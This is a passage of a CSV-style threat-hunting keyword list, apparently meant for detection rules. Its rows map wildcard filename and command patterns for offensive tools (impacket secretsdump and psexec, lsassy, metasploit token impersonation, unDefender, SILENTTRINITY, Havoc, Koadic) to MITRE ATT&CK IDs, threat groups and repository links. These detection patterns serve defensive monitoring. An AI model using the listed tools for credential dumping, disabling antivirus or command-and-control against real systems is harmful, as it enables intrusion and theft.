Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-dcomexec*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacketfile.py*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*impacket-GetADUsers*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-GetNPUsers*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-getST*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-getTGT*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacketldap_shell*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacketlogger*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-lookupsid*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacketmssqlshell*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-netview*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacketntlmrelayx*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacketos_ident*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-psexec*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-reg*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-reg*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library,T1071.001 - T1071.002 - T1071.004 - T1071.005 ,TA0005 - TA0006,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,POST Exploitation tools,https://github.com/SecureAuthCorp/impacket,1,1,N/A,N/A,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacketremcomsvc*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacketrpcdatabase*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-rpcdump*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-samrdump*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacketsecretsdump*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-secretsdump*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-secretsdump*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*impacketserviceinstall*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-services*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacketsmbclient*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-smbclient*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-smbserver*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-ticketer*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacketutils*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-wmiexec*,offensive_tool_keyword,AD exploitation cheat sheet,Command execution with WMI From Linux,T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*impacket-wmiexec*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library,T1071.001 - T1071.002 - T1071.004 - T1071.005 ,TA0005 - TA0006,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,POST Exploitation tools,https://github.com/SecureAuthCorp/impacket,1,1,N/A,N/A,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*ImpactDecoder*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*ImpactPacket*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impersonate_token *Administrator*,offensive_tool_keyword,metasploit,metasploit command lines patterns,T1573.002 - T1043 - T1021,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation Tools,N/A,1,0,Incognito,10,10,N/A,N/A,N/A,N/A -*impersonate_token *BUILTIN\Administrators*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ImpersonateAndUnload.cpp*,offensive_tool_keyword,unDefender,Killing your preferred antimalware by abusing native symbolic links and NT paths.,T1562.001 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/APTortellini/unDefender,1,1,N/A,10,4,309,78,2022-01-29T12:35:31Z,2021-08-21T14:45:39Z -*ImpersonateLocalService*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*ImpersonateLoggedOnUser*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*impersonateprocess.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*impersonateuser.boo*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*impersonateuser.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*imperva_gzip.py*,offensive_tool_keyword,Imperva_gzip_WAF_Bypass,Imperva Cloud WAF was vulnerable to a bypass that allows attackers to evade WAF rules when sending malicious HTTP POST payloads. such as log4j exploits. SQL injection. command execution. directory traversal. XXE. etc.,T1190 - T1210 - T1506 - T1061 - T1071 - T1100 - T1220,TA0001 - TA0002 - TA0003 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/BishopFox/Imperva_gzip_WAF_Bypass,1,1,N/A,N/A,2,146,29,2022-01-07T17:39:29Z,2022-01-07T17:38:33Z -*Implant*TeamServer.exe*,offensive_tool_keyword,VirusTotalC2,Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. now you have a free one,T1071.004 - T1102 - T1021.002,TA0011 - TA0008 - TA0042,N/A,N/A,C2,https://github.com/RATandC2/VirusTotalC2,1,1,N/A,10,10,5,81,2022-09-28T15:10:44Z,2022-09-28T15:12:42Z -*Implant.ImplantGenerator*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,0,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*implant.sleep-obf*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*implant/elevate/*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows 